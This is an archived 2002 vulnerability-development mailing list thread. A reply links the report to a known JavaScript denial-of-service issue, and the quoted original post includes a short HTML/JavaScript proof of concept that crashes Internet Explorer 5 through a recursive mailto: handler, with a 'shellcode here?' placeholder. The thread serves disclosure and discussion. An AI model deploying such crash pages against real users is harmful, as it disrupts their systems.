Vulnerability Development mailing list archives

RE: Buffer Overflow with all versions of Internet Explorer and Ja vacript.

From: Patrik Birgersson <float () aiasec com>
Date: Mon, 3 Jun 2002 23:17:33 +0200 (CEST)

This seems quite familiar to the "Multiple Vendor JavaScript Interpreter
Denial Of Service Vulnerability" reported to Bugtraq in march.
http://online.securityfocus.com/bid/4322


Patrik Birgersson

-----Original Message-----
From: Matias Sedalo [mailto:s0t4ipv6 () shellcode com ar]
Sent: 2. juni 2002 23:08
To: vuln-dev () securityfocus com
Subject: Buffer Overflow with all versions of Internet Explorer and
Javacript.


the 28/07/1999 I have discovered a stack buffer overflow caused by until
the moment all the versions of the Internet Explorer.
In many windows98 causes the necessity to reinitiate the equipment, since
to my to seem it remains without memory.
Only it has been proven in several versions 5 of IE on WindowsNT
server sp6 and windows98 Second Edition.  As I said before the Windows 98
I had to reinitiate it to the force.
Can be possible to execute arbitrary code using the variable company of
the example?

// internet Explorer 5.00.2314.1003 on WindowsNT 4 sp6
// internet Explorer 5.00.3500.1003 on Windows98se

-----------cut here---------------------------
<html><head></head>
<script language="JAVASCRIPT">
function hacerMail() {
  var company;

  crear();
  address="s0t4ipv6 () shellcode com ar";
  soporte();
}
function soporte(){
  var soporte="bill () mocosoft com";
  window.location="mailto:"+address+"?cc="+soporte+"&subject="+company;
// window.location=company;             // also this line cause the bof.
  close(hacerMail());
}
function crear(){
company="shellcode here?\n";            // i don't think so.
}
</script>
  <input type="button" onClick="hacerMail();" value="SMASH!"></input>
</html>
-----------cut here---------------------------

Regards.

- Internet es perjudicial para la salud -
- Ley N~ 127.0.0.1

Matias Sedalo
http://www.shellcode.com.ar

s0t4ipv6 () shellcode com ar
B7A1 B45E 4906 34BD 70A1 55F8 E5A0 BCA2
........................................

Current thread:

RE: Buffer Overflow with all versions of Internet Explorer and Ja vacript. Thor Larholm (Jun 03)
- RE: Buffer Overflow with all versions of Internet Explorer and Javacript. Elan Hasson (Jun 03)
  - Re: Buffer Overflow with all versions of Internet Explorer and Javacript. Blue Boar (Jun 03)
    - RE: Buffer Overflow with all versions of Internet Explorer and Javacript. Elan Hasson (Jun 04)
- RE: Buffer Overflow with all versions of Internet Explorer and Ja vacript. Patrik Birgersson (Jun 03)
- <Possible follow-ups>
- RE: Buffer Overflow with all versions of Internet Explorer and Ja vacript. Thor Larholm (Jun 03)